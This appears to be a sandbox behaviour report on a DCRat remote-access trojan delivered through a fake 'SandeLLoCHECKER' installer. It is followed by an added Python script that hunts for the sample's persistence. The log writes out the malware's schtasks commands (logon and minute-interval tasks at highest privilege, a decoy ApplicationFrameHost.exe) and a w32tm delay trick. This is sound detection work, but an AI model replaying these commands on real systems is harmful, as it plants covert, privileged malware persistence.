Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Code function: 3_2_009AAE10 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Code function: 1_2_004AA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | File created: C:\Users\user\Desktop\yYksYVbT.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\4ea4b9242e059cec7c8f71f08c454db16c298bd3e44de5a4ee8c3ef811c40795
Source: C:\Users\user\Desktop\gorkmTnChA.exe | File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: sfxname (1_2_004ADF1E)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: sfxstime (1_2_004ADF1E)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: STARTDLG (1_2_004ADF1E)
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Command line argument: xzN (1_2_004ADF1E)
Source: gorkmTnChA.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (reported 15 times)
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\gorkmTnChA.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2898761896.000000000346F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT `FileName`, `MinVersion`, `MaxVersion`, `MinSize` , `MaxSize`, `MinDate`, `MaxDate`, `Languages` FROM `Signature` WHERE `Signature` = ?;
Source: gorkmTnChA.exe | ReversingLabs: Detection: 100%
Source: unknown | Process created: C:\Users\user\Desktop\gorkmTnChA.exe "C:\Users\user\Desktop\gorkmTnChA.exe"
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeMonitorDhcpCommon\osBsCLbPfQftwHCHlhElxAOzJXM9OXwC38dZCkih.vbe"
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Process created: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe "C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 26CF464DBA35F416758053A43B23FD3D C
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Local\Temp\{F123046A-2CBF-4743-A59B-E3D2751B5780}\51B5780\SandeLLoCHECKER_Installer.msi AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1733667848 " AI_FOUND_PREREQS=".NET Framework 4.8 (web installer)"
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7BC9C83AA604E4F7E55BC37E42BF8976 C
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeMonitorDhcpCommon\KQ5XnVOYWwQFrPTZ9PsIrToBZTIRzi3E3YTHck8Ca7MF45bBlpw.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe "C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 8 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 10 /tr "'C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown | Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
Source: unknown | Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files (x86)\reference assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe "C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe"
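The schtasks.exe lines above are the persistence footprint this sample leaves: for every copy of KAdpNCgonFhCnlBRasdZerWl.exe, and for the ApplicationFrameHost.exe decoy planted under Default User\Favorites, webDriverintoDll.exe registers an ONLOGON task with /rl HIGHEST plus MINUTE-interval restart tasks under a near-identical name (the same name with one letter appended). The batch file it then launches runs chcp 65001 followed by w32tm /stripchart against localhost, which serves as a short delay before the renamed copy is started. The Python below is an added example, not Joe Sandbox code: it hunts for that pattern in process-creation command lines (Sysmon event 1 or Security 4688). The sample lines are copied from this report plus one constructed benign task; the list of system binary names used for the masquerade check is an assumption to adapt to your estate.

```python
"""Hunt DCRat-style scheduled-task persistence in process-creation logs.

Added example, not Joe Sandbox output. The input lines are the schtasks.exe and
w32tm.exe command lines from the report above plus one constructed benign task.
"""
import re
from collections import defaultdict

SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /f''',
    r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWl" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "KAdpNCgonFhCnlBRasdZerWlK" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /f''',
    r'''schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Favorites\ApplicationFrameHost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Vendor\backup.exe" /f''',  # constructed benign control
    r'''w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2''',
]

# Assumption: binary names that only belong under C:\Windows; extend for your environment.
SYSTEM_BINARY_NAMES = {"applicationframehost.exe", "svchost.exe", "dllhost.exe", "winlogon.exe"}


def parse_schtasks(cmdline):
    """Return the fields of a 'schtasks /create' command line, or None for anything else."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*\s/create\b", cmdline, re.I):
        return None

    def flag(pattern):
        m = re.search(pattern, cmdline, re.I)
        return m.group(1) if m else None

    return {
        "name": flag(r'/tn\s+"([^"]+)"'),
        "schedule": (flag(r"/sc\s+(\w+)") or "").upper(),
        "interval": int(flag(r"/mo\s+(\d+)") or 0),
        # DCRat wraps the target as "'C:\...exe'"; accept either quoting style.
        "target": flag(r"""/tr\s+"'?([^"']+)"""),
        "highest": bool(re.search(r"/rl\s+HIGHEST", cmdline, re.I)),
    }


def is_w32tm_sleep(cmdline):
    """w32tm /stripchart against localhost is a timing loop, not time sync."""
    return bool(re.search(r"\bw32tm\b.*\s/stripchart\b.*\s/computer:localhost\b", cmdline, re.I))


def analyze(cmdlines, max_interval=15):
    """Group task registrations by target binary and return (findings, sleep_cmdlines)."""
    by_target = defaultdict(list)
    for line in cmdlines:
        task = parse_schtasks(line)
        if task and task["target"]:
            by_target[task["target"].lower()].append(task)

    findings = []
    for target, group in by_target.items():
        schedules = {t["schedule"] for t in group}
        reasons = []
        if {"ONLOGON", "MINUTE"} <= schedules:
            reasons.append("logon trigger plus minute-interval watchdog for one binary")
        intervals = [t["interval"] for t in group
                     if t["schedule"] == "MINUTE" and 0 < t["interval"] <= max_interval]
        if intervals:
            reasons.append(f"relaunched every {min(intervals)} min")
        if any(t["highest"] for t in group):
            reasons.append("runs with /rl HIGHEST")
        names = sorted({t["name"] for t in group}, key=len)
        if len(names) > 1 and all(n.startswith(names[0]) for n in names):
            reasons.append("task names differ only by a suffix")
        basename = target.rsplit("\\", 1)[-1]
        if basename in SYSTEM_BINARY_NAMES and "\\windows\\" not in target:
            reasons.append(f"{basename} outside the Windows directory")
        if len(reasons) >= 2:          # one weak signal alone is not worth an alert
            findings.append({"target": target, "tasks": len(group), "reasons": reasons})

    sleeps = [line for line in cmdlines if is_w32tm_sleep(line)]
    return findings, sleeps


if __name__ == "__main__":
    hits, sleeps = analyze(SAMPLE_CMDLINES)
    for hit in hits:
        print(f"{hit['target']} ({hit['tasks']} tasks): " + "; ".join(hit["reasons"]))
    print(f"{len(sleeps)} w32tm sleep command line(s)")
```

The grouping by target path is what makes this robust: the task names are random per build, but every DCRat build registers more than one task for the same executable, so correlating on the /tr value rather than on /tn survives the renaming.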
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: davhlpr.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msimg32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: dbghelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cabinet.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: lpk.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: msihnd.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeSection loaded: cryptsp.dllJump to behavior
